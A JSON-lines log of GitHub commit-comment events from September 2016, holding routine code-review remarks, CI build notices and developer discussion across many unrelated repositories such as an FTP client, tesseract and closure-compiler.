{"id":"4501773484","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18861617,"position":69,"line":137,"path":"src/main/java/com/softserverinc/edu/controllers/IssueController.java","commit_id":"0281ace01f9d2189fda2d9bb21670166aa2ec67e","created_at":"2016-09-01T10:35:53Z","updated_at":"2016-09-01T10:35:53Z","body":"`changeAssignee()` and `changeStatus()` methods looks likve very similar, I think need remove code duplication "}},"created_at":"2016-09-01T10:35:53Z"}
{"id":"4501773867","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861621,"position":258,"line":258,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:35:59Z","updated_at":"2016-09-01T10:35:59Z","body":"formatting"}},"created_at":"2016-09-01T10:35:59Z"}
{"id":"4501779352","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861638,"position":36,"line":36,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:37:21Z","updated_at":"2016-09-01T10:37:21Z","body":"Java naming convention calls for leading lowercase camelCase "}},"created_at":"2016-09-01T10:37:21Z"}
{"id":"4501780155","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861640,"position":60,"line":60,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:37:33Z","updated_at":"2016-09-01T10:37:33Z","body":"FTP response usualy has codes the codes range from 100 to 10068 the best way to see the last line of code is via this\r\nto avoid parsing each line from FTP to find the code, then when i finaly find the last line with code i need to convert it to int and then verify if that is a valid FTP code."}},"created_at":"2016-09-01T10:37:33Z"}
{"id":"4501780997","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861641,"position":79,"line":79,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:37:45Z","updated_at":"2016-09-01T10:37:45Z","body":"Agreed\r\n"}},"created_at":"2016-09-01T10:37:45Z"}
{"id":"4501783217","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18861647,"position":null,"line":null,"path":null,"commit_id":"66c7f1f39f4bff00cd41548d20f7ab8a10c2b11b","created_at":"2016-09-01T10:38:18Z","updated_at":"2016-09-01T10:38:18Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/344/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T10:38:18Z"}
{"id":"4501784290","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18861649,"position":53,"line":99,"path":"src/main/java/com/softserverinc/edu/configs/SecurityConfig.java","commit_id":"6c2c23282d51bd5dc5c772efa0f0f8d9bb785e4d","created_at":"2016-09-01T10:38:33Z","updated_at":"2016-09-01T10:38:33Z","body":"can be refactored to:\r\n` return new BCryptPasswordEncoder(12);`\r\n\r\n"}},"created_at":"2016-09-01T10:38:33Z"}
{"id":"4501784295","type":"CommitCommentEvent","actor":{"login":"perezsolerj"},"repo":{"name":"uji-ros-pkg/underwater_simulation"},"payload":{"comment":{"id":18861650,"position":44,"line":87,"path":"uwsim/CMakeLists.txt","commit_id":"34197de21e11317475b16ec0683e77cb074a9923","created_at":"2016-09-01T10:38:33Z","updated_at":"2016-09-01T10:38:33Z","body":"This is just a revert for indigo/jade. This line should be added to kinetic branch. I merged the kinetic changes to the wrong branch and it didn't build so I had to revert them but couldn't get a kinetic environment so I didn't upload them in the new branch. Now that Ubuntu LTS is out the kinetic release in the TO-DO list."}},"created_at":"2016-09-01T10:38:33Z"}
{"id":"4501784689","type":"CommitCommentEvent","actor":{"login":"xiaoxintiaoda"},"repo":{"name":"swoole/framework"},"payload":{"comment":{"id":18861651,"position":null,"line":null,"path":null,"commit_id":"e7cb55fb8df2e0de16a2ebe72be87844418a4ca3","created_at":"2016-09-01T10:38:40Z","updated_at":"2016-09-01T10:38:40Z","body":"腻害腻害!!"}},"created_at":"2016-09-01T10:38:40Z"}
{"id":"4501790362","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18861665,"position":null,"line":null,"path":null,"commit_id":"562fef758dd525e3318719a65412b5992a639457","created_at":"2016-09-01T10:40:07Z","updated_at":"2016-09-01T10:40:07Z","body":"Do you have it without tabs (Device, Location etc.)? "}},"created_at":"2016-09-01T10:40:07Z"}
{"id":"4501790378","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18861666,"position":53,"line":53,"path":"src/test/java/com/softserverinc/edu/controllers/UserControllerTest.java","commit_id":"09793953f9a95ab06a406e9f7f25b8f52616ffcb","created_at":"2016-09-01T10:40:08Z","updated_at":"2016-09-01T10:40:08Z","body":":+1:  +1 for test!"}},"created_at":"2016-09-01T10:40:08Z"}
{"id":"4501791712","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861669,"position":143,"line":143,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:40:25Z","updated_at":"2016-09-01T10:40:25Z","body":"There seems to be the same pattern with all of the ftp commands, which looks something like:\r\n\r\n1) check the connection\r\n2) send the command\r\n3) read response\r\n4) verify response\r\n\r\nThis means that it can be generalized - i.e. common functionality can be moved to a common method/function instead of repeating it all over the place"}},"created_at":"2016-09-01T10:40:25Z"}
{"id":"4501792754","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18861675,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T10:40:40Z","updated_at":"2016-09-01T10:40:40Z","body":"@lekma I'm not sure that I have time but I`ll try\r\nbtw vaapi vs not vaapi at gpu_top \r\nno: ~12-24% \r\nwith: ~15-30% gpu usage\r\ndoesn't looks too good i think, maybe it only works partly like the scale down or something"}},"created_at":"2016-09-01T10:40:40Z"}
{"id":"4501797044","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861682,"position":36,"line":36,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:41:48Z","updated_at":"2016-09-01T10:41:48Z","body":"Agreed I made a boo boo"}},"created_at":"2016-09-01T10:41:48Z"}
{"id":"4501797237","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861683,"position":18,"line":18,"path":"src/gorjan/test/transferData/TransferFiles.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:41:50Z","updated_at":"2016-09-01T10:41:50Z","body":"You're using too much of public static - basically avoiding the proper encapsulation and object oriented programming. "}},"created_at":"2016-09-01T10:41:50Z"}
{"id":"4501797748","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18861684,"position":null,"line":null,"path":null,"commit_id":"c861feee180e061dd9b45ecf7341acd50246bce9","created_at":"2016-09-01T10:41:57Z","updated_at":"2016-09-01T10:41:57Z","body":"I had merged an equivalent fix to staging yesterday: https://github.com/NixOS/nixpkgs/pull/18132. Resolved the merge conflict over to that one as it had already received some Hydra testing. (Also for some obscene reason the build-time closure of a stock NixOS install depends on mesa nowadays, which is a reverse dep of this.)"}},"created_at":"2016-09-01T10:41:57Z"}
{"id":"4501802976","type":"CommitCommentEvent","actor":{"login":"AyurM"},"repo":{"name":"AyurM/Gamblines"},"payload":{"comment":{"id":18861697,"position":null,"line":null,"path":null,"commit_id":"c1ea640ffdf3c1d44d7f4036cdafef36f185809c","created_at":"2016-09-01T10:43:17Z","updated_at":"2016-09-01T10:43:17Z","body":"Исправлен баг, при котором новые кубики могли генерироваться на месте уже существующих. Среди стартовых кубиков теперь не может появиться совпадающая комбинация"}},"created_at":"2016-09-01T10:43:17Z"}
{"id":"4501804285","type":"CommitCommentEvent","actor":{"login":"LNJ2"},"repo":{"name":"pithydon/viaduct"},"payload":{"comment":{"id":18861699,"position":null,"line":null,"path":null,"commit_id":"c3d56afee613879bcee7dbaafde1e4e2ef381bec","created_at":"2016-09-01T10:43:36Z","updated_at":"2016-09-01T10:43:36Z","body":"You can also check if TNG is used with:\r\n```lua\r\nif default.NAME == \"tng\" then\r\n      ...\r\nend\r\n```\r\n\r\nI'm happy to see that some people like my subgame as much that they add support for it in their mods! :+1: :smiley: "}},"created_at":"2016-09-01T10:43:36Z"}
{"id":"4501808984","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861710,"position":13,"line":13,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:44:48Z","updated_at":"2016-09-01T10:44:48Z","body":"If something applies to all connections then the proper way to expose that would be to share the ConnectionDetails object between all connections - it's generally a good idea to try to avoid mutable static fields in Java - by doing that you make the code much easier to reason about, and also make sure that a rogue process will not change stuff around,"}},"created_at":"2016-09-01T10:44:48Z"}
{"id":"4501811549","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861716,"position":36,"line":36,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:45:24Z","updated_at":"2016-09-01T10:45:24Z","body":"Ack"}},"created_at":"2016-09-01T10:45:24Z"}
{"id":"4501815529","type":"CommitCommentEvent","actor":{"login":"vobruba-martin"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":18861722,"position":null,"line":null,"path":null,"commit_id":"05fa13a146ea9f9570994b04e7974b6d58283d37","created_at":"2016-09-01T10:46:19Z","updated_at":"2016-09-01T10:46:19Z","body":"@MatrixFrog I wanted to avoid this when I was preparing this extern file because NTI shows a warning:\r\n\r\n```\r\nWARNING - All constants must be typed. The compiler could not infer the type of constant window.$. Please use an explicit type annotation. For more information, see:\r\nhttps://github.com/google/closure-compiler/wiki/Using-NTI-(new-type-inference)#warnings-about-uninferred-constants\r\nvar $ = jQuery;\r\n    ^\r\n```\r\n\r\nand I have no idea how to easily set type of `$`"}},"created_at":"2016-09-01T10:46:19Z"}
{"id":"4501817966","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861730,"position":36,"line":36,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:46:56Z","updated_at":"2016-09-01T10:46:56Z","body":":P"}},"created_at":"2016-09-01T10:46:56Z"}
{"id":"4501818249","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861731,"position":14,"line":14,"path":"src/gorjan/helperTools/HelperTools.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:47:02Z","updated_at":"2016-09-01T10:47:02Z","body":"In case of paralell execution if multiple files attempt to access the conversion"}},"created_at":"2016-09-01T10:47:02Z"}
{"id":"4501818600","type":"CommitCommentEvent","actor":{"login":"AayushRd7"},"repo":{"name":"amalappunni/android_kernel_cyanogen_msm8916"},"payload":{"comment":{"id":18861733,"position":null,"line":null,"path":null,"commit_id":"029f3d6daafbbd516c804552d7ed8b4132514693","created_at":"2016-09-01T10:47:07Z","updated_at":"2016-09-01T10:47:07Z","body":"lemme put a . xD"}},"created_at":"2016-09-01T10:47:07Z"}
{"id":"4501820252","type":"CommitCommentEvent","actor":{"login":"ChadKillingsworth"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":18861735,"position":null,"line":null,"path":null,"commit_id":"05fa13a146ea9f9570994b04e7974b6d58283d37","created_at":"2016-09-01T10:47:31Z","updated_at":"2016-09-01T10:47:31Z","body":"That's a bug in NTI. I thought it had already been fixed though."}},"created_at":"2016-09-01T10:47:31Z"}
{"id":"4501822219","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861743,"position":43,"line":43,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:47:57Z","updated_at":"2016-09-01T10:47:57Z","body":"What I meant was you should check the arguments before doing any work with them. \r\n\r\nThe String fileForUpload can be null - the usual way of handling this is throwing NPE or IAE in case you receive an argument which makes no sense."}},"created_at":"2016-09-01T10:47:57Z"}
{"id":"4501825048","type":"CommitCommentEvent","actor":{"login":"catalineadesign"},"repo":{"name":"catalineadesign/test"},"payload":{"comment":{"id":18861752,"position":null,"line":null,"path":null,"commit_id":"0b607edd7ea4b95d69207ff1ea1b33de5fd67e6d","created_at":"2016-09-01T10:48:37Z","updated_at":"2016-09-01T10:48:37Z","body":"ok"}},"created_at":"2016-09-01T10:48:37Z"}
{"id":"4501826253","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18861755,"position":null,"line":null,"path":null,"commit_id":"3635568d58810bcd9ed0f4b6ad896be652f4c71b","created_at":"2016-09-01T10:48:56Z","updated_at":"2016-09-01T10:48:56Z","body":"Did it give you any messages at all? Because if you accidentally have it open twice (main0.py opens it as well, if the port setting is set), it wouldn't notice and just don't output anything but the start message in the second window."}},"created_at":"2016-09-01T10:48:56Z"}
{"id":"4501830950","type":"CommitCommentEvent","actor":{"login":"analytically"},"repo":{"name":"apache/tinkerpop"},"payload":{"comment":{"id":18861765,"position":8,"line":73,"path":"gremlin-benchmark/pom.xml","commit_id":"fbde4e2ae67b52ad56b4c33f8b3c7eb56a1a5fea","created_at":"2016-09-01T10:49:59Z","updated_at":"2016-09-01T10:49:59Z","body":"<scope>test</scope>?"}},"created_at":"2016-09-01T10:49:59Z"}
{"id":"4501832396","type":"CommitCommentEvent","actor":{"login":"peycho"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18861768,"position":null,"line":null,"path":null,"commit_id":"3ae10160820782d039c3449107960108fb3a63b9","created_at":"2016-09-01T10:50:21Z","updated_at":"2016-09-01T10:50:21Z","body":"This is something that I definitely will use.\r\n\r\nThanks."}},"created_at":"2016-09-01T10:50:21Z"}
{"id":"4501834585","type":"CommitCommentEvent","actor":{"login":"shakycode"},"repo":{"name":"plataformatec/devise"},"payload":{"comment":{"id":18861777,"position":null,"line":null,"path":null,"commit_id":"4511bea953b551a3745972952bcefef1e42032b3","created_at":"2016-09-01T10:50:53Z","updated_at":"2016-09-01T10:50:53Z","body":"+1"}},"created_at":"2016-09-01T10:50:53Z"}
{"id":"4501838768","type":"CommitCommentEvent","actor":{"login":"amitdo"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861786,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T10:51:47Z","updated_at":"2016-09-01T10:51:47Z","body":"I agree with @Shreeshrii."}},"created_at":"2016-09-01T10:51:47Z"}
{"id":"4501839037","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18861787,"position":null,"line":null,"path":null,"commit_id":"3635568d58810bcd9ed0f4b6ad896be652f4c71b","created_at":"2016-09-01T10:51:52Z","updated_at":"2016-09-01T10:51:52Z","body":"It was working fine, serving up files and showing which files it's serving up.\r\nThen it just stopped serving files (and nothing new showing on console).\r\nI've got it disabled for the workers.\r\n\r\nIf it happens again I'll at least check netstat to see if the port is still open and try access it through Charles proxy to see where it's getting stuck. Didn't have the mindset to do that before sorry"}},"created_at":"2016-09-01T10:51:52Z"}
{"id":"4501839182","type":"CommitCommentEvent","actor":{"login":"Shreeshrii"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861788,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T10:51:54Z","updated_at":"2016-09-01T10:51:54Z","body":"@zdenop True. But leptonica is maintained by a separate group of people.\ntessdata is part of tesseract-ocr.\n\nShreeDevi\n____________________________________________________________\nभजन - कीर्तन - आरती @ http://bhajans.ramparivar.com\n\nOn Thu, Sep 1, 2016 at 3:59 PM, zdenop <notifications@github.com> wrote:\n\n> @Shreeshrii <https://github.com/Shreeshrii>: leptonica is also must for\n> tesseract and we do not included it to tesseract library. ;-)\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tesseract-ocr/tesseract/commit/b14f7353abe600948780c23dd83491fd4a132f22#commitcomment-18861554>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE2_o3dMwCz_mIGno85Q1p_95M-Wk8KCks5qlqkegaJpZM4JyhV9>\n> .\n>\n"}},"created_at":"2016-09-01T10:51:54Z"}
{"id":"4501839815","type":"CommitCommentEvent","actor":{"login":"kchatterjee72"},"repo":{"name":"krish-project/weather"},"payload":{"comment":{"id":18861836,"position":null,"line":null,"path":null,"commit_id":"731887f5ae8ab0eaf09316af5f8cc0c8d041afc0","created_at":"2016-09-01T10:52:05Z","updated_at":"2016-09-01T10:52:05Z","body":"perfect"}},"created_at":"2016-09-01T10:52:05Z"}
{"id":"4501840772","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18861838,"position":null,"line":null,"path":null,"commit_id":"28d53f5b9508b9ecd186a2a341704696245256c5","created_at":"2016-09-01T10:52:18Z","updated_at":"2016-09-01T10:52:18Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=934)"}},"created_at":"2016-09-01T10:52:18Z"}
{"id":"4501846486","type":"CommitCommentEvent","actor":{"login":"matthewelse"},"repo":{"name":"ARMmbed/jerryscript"},"payload":{"comment":{"id":18861849,"position":null,"line":null,"path":null,"commit_id":"da6619977ecc319dd48675fee7a9dc3b985d1671","created_at":"2016-09-01T10:53:22Z","updated_at":"2016-09-01T10:53:22Z","body":"@polaroi8d this is fixed now, this was a temporary repo while I was doing development on jerryscript previously."}},"created_at":"2016-09-01T10:53:22Z"}
{"id":"4501847160","type":"CommitCommentEvent","actor":{"login":"arkaitz97"},"repo":{"name":"UnrealCourse/02_BullCowGame"},"payload":{"comment":{"id":18861850,"position":null,"line":null,"path":null,"commit_id":"4bf71623b83625fc619fe30c694df519a6059d3d","created_at":"2016-09-01T10:53:33Z","updated_at":"2016-09-01T10:53:33Z","body":"Changing the first for to something like this the error when the guess is shorter than the hidden word doesn't appear\r\n\r\n`for (int32 i = 0; i < GuessLength; i++)`"}},"created_at":"2016-09-01T10:53:33Z"}
{"id":"4501856338","type":"CommitCommentEvent","actor":{"login":"jacobly0"},"repo":{"name":"CE-Programming/toolchain"},"payload":{"comment":{"id":18861873,"position":null,"line":null,"path":null,"commit_id":"282efa9b4847fb720228ced9bab8e7f4bf6779bb","created_at":"2016-09-01T10:55:43Z","updated_at":"2016-09-01T10:55:43Z","body":"AFAIK, the previous version was correct, but in any case, this version is horribly wrong.  Crashes with size = 0, fails to crash with dest = NULL."}},"created_at":"2016-09-01T10:55:43Z"}
{"id":"4501862915","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"Armanhhrayri/Address_Book"},"payload":{"comment":{"id":18861930,"position":7,"line":45,"path":"src/Data.java","commit_id":"3e6eb81213f9a03c6e37515c89652d94f48990c8","created_at":"2016-09-01T10:57:13Z","updated_at":"2016-09-01T10:57:13Z","body":"You can use here users.contains method of List interface"}},"created_at":"2016-09-01T10:57:13Z"}
{"id":"4501865353","type":"CommitCommentEvent","actor":{"login":"spmallette"},"repo":{"name":"apache/tinkerpop"},"payload":{"comment":{"id":18861935,"position":8,"line":73,"path":"gremlin-benchmark/pom.xml","commit_id":"fbde4e2ae67b52ad56b4c33f8b3c7eb56a1a5fea","created_at":"2016-09-01T10:57:43Z","updated_at":"2016-09-01T10:57:43Z","body":"i had it that way, but then i noticed that there's no tests in gremlin-benchmark. "}},"created_at":"2016-09-01T10:57:43Z"}
{"id":"4501866760","type":"CommitCommentEvent","actor":{"login":"mmghahremanpour"},"repo":{"name":"mmghahremanpour/openbabel"},"payload":{"comment":{"id":18861937,"position":null,"line":null,"path":null,"commit_id":"9fdfc1120fff9fd3009df4cfe8d789c92a49c1e1","created_at":"2016-09-01T10:57:55Z","updated_at":"2016-09-01T10:57:55Z","body":"Thanks Geoff for you informative points. \r\nThe problems related to the enum kkTYPE and the position of the argument in the method is solved. "}},"created_at":"2016-09-01T10:57:55Z"}
{"id":"4501867259","type":"CommitCommentEvent","actor":{"login":"adriweb"},"repo":{"name":"CE-Programming/toolchain"},"payload":{"comment":{"id":18861938,"position":null,"line":null,"path":null,"commit_id":"282efa9b4847fb720228ced9bab8e7f4bf6779bb","created_at":"2016-09-01T10:58:02Z","updated_at":"2016-09-01T10:58:02Z","body":"So it's more like a fastest `memset_fast_nochecks` version requiring the programmer to know exactly what he calls it with :P"}},"created_at":"2016-09-01T10:58:02Z"}
{"id":"4501867397","type":"CommitCommentEvent","actor":{"login":"zdenop"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861939,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T10:58:04Z","updated_at":"2016-09-01T10:58:04Z","body":"This is for discussion on dev forum not here ;-)\r\n"}},"created_at":"2016-09-01T10:58:04Z"}
{"id":"4501873395","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18861961,"position":9,"line":20,"path":"R/cut.integer.R","commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T10:59:27Z","updated_at":"2016-09-01T10:59:27Z","body":"I'm not sure if this is the right way to implement this (I'm hoping there is a better way we don't yet know about), but I agree with your comments here."}},"created_at":"2016-09-01T10:59:27Z"}
{"id":"4501874077","type":"CommitCommentEvent","actor":{"login":"davebraze"},"repo":{"name":"gtojty/OtoP"},"payload":{"comment":{"id":18861966,"position":21,"line":110,"path":"readme.md","commit_id":"3406458ce14f85eea95c3c067b49abd45767a8a4","created_at":"2016-09-01T10:59:36Z","updated_at":"2016-09-01T10:59:36Z","body":"Hi Tao, \r\nThis leaves the point of my query here incompletely addressed. You give a definition of what a sampling point is. But you do not say how the specific set of sampling points used in a given model run are determined. Are these parameters to the model? Are they hard coded somewhere in the c file? Please add this detail."}},"created_at":"2016-09-01T10:59:36Z"}
{"id":"4501874295","type":"CommitCommentEvent","actor":{"login":"Shreeshrii"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861967,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T10:59:39Z","updated_at":"2016-09-01T10:59:39Z","body":"To me ` You need to install at least English language data file to TESSDATA_PREFIX directory` implies that english traineddata files are MANDATORY / REQUIRED for correct functioning of tesseract. \r\n\r\nIMHO, It would make it much easier for users/developers using git as source if this along with osd.traineddata and other required files were included with source. \r\n\r\nProbably an easy way would be to add sym links? from tesseract-ocr/tesseract/tessdata to tesseract-ocr/tessdata so that files have to updated only in tessdata repository.\r\n"}},"created_at":"2016-09-01T10:59:39Z"}
{"id":"4501875369","type":"CommitCommentEvent","actor":{"login":"JasonDalton"},"repo":{"name":"Azimuth1/SARCAT"},"payload":{"comment":{"id":18861971,"position":null,"line":null,"path":null,"commit_id":"98acf00afdd5084fd3338af26d33c16fa5bb997e","created_at":"2016-09-01T10:59:55Z","updated_at":"2016-09-01T10:59:55Z","body":"Thanks Joseph!"}},"created_at":"2016-09-01T10:59:55Z"}
{"id":"4501877413","type":"CommitCommentEvent","actor":{"login":"ehamberg"},"repo":{"name":"blankoslo/floq-staffing"},"payload":{"comment":{"id":18861975,"position":null,"line":null,"path":null,"commit_id":"feb90629b5afa58a561c8bd64d658c6d1bac0514","created_at":"2016-09-01T11:00:24Z","updated_at":"2016-09-01T11:00:24Z","body":"Nice! Throw it into the Travis config as well (together with test & lint)! :)"}},"created_at":"2016-09-01T11:00:24Z"}
{"id":"4501877678","type":"CommitCommentEvent","actor":{"login":"Shreeshrii"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861976,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T11:00:27Z","updated_at":"2016-09-01T11:00:27Z","body":"@zdenop  OK."}},"created_at":"2016-09-01T11:00:27Z"}
{"id":"4501877825","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18861977,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-01T11:00:29Z","updated_at":"2016-09-01T11:00:29Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.154](http://build.clear-measure.com/viewLog.html?buildId=10325&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-01T11:00:29Z"}
{"id":"4501881978","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18861985,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T11:01:26Z","updated_at":"2016-09-01T11:01:26Z","body":"that doesn't make much sense: if there is no vaapi accel you shouldn't see any activity in gpu_top"}},"created_at":"2016-09-01T11:01:26Z"}
{"id":"4501887192","type":"CommitCommentEvent","actor":{"login":"sj26"},"repo":{"name":"buildkite/elastic-ci-stack-for-aws"},"payload":{"comment":{"id":18861996,"position":null,"line":null,"path":null,"commit_id":"4f49f9a655c6cc166271cdeb3364d701ecf0cdc1","created_at":"2016-09-01T11:02:35Z","updated_at":"2016-09-01T11:02:35Z","body":"The quotes around EOF Ames eimportant and delay the variable interpolation... Did this work?"}},"created_at":"2016-09-01T11:02:35Z"}
{"id":"4501887539","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18861998,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-01T11:02:39Z","updated_at":"2016-09-01T11:02:39Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.154](http://build.clear-measure.com/viewLog.html?buildId=10325&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:10"}},"created_at":"2016-09-01T11:02:39Z"}
{"id":"4501889059","type":"CommitCommentEvent","actor":{"login":"druzhkov"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":18862004,"position":5,"line":98,"path":"upload/admin/model/report/customer.php","commit_id":"a53e8b7e41de215d0a9bafaa20ad85e896f35464","created_at":"2016-09-01T11:03:01Z","updated_at":"2016-09-01T11:03:01Z","body":"There should be \"SUM(op.total) AS total\" or \"SUM(DISTINCT(o.total)) AS total\" . This query generates wrong statistic."}},"created_at":"2016-09-01T11:03:01Z"}
{"id":"4501889288","type":"CommitCommentEvent","actor":{"login":"rmeissn"},"repo":{"name":"slidewiki/slidewiki-platform"},"payload":{"comment":{"id":18862008,"position":4,"line":16,"path":".travis.yml","commit_id":"ea1518021727baf21a62f4d22d28e9a095b12e54","created_at":"2016-09-01T11:03:05Z","updated_at":"2016-09-01T11:03:05Z","body":"Exchange with:\r\n`if ( [ \"$a\" == \"a\" ] || [ \"$a\" == \"b\" ] ) && ( [ \"$b\" == \"c\" ] ); then`\r\nin order to keep it a one liner."}},"created_at":"2016-09-01T11:03:05Z"}
{"id":"4501892331","type":"CommitCommentEvent","actor":{"login":"Reinmar"},"repo":{"name":"ckeditor/ckeditor5-utils"},"payload":{"comment":{"id":18862016,"position":7,"line":13,"path":"tests/unicode.js","commit_id":"574874e7aa3e3b4bb8cc11ed5e54ad7aed84c864","created_at":"2016-09-01T11:03:47Z","updated_at":"2016-09-01T11:03:47Z","body":"I think it would be worth asking. Especially that it broke our code."}},"created_at":"2016-09-01T11:03:47Z"}
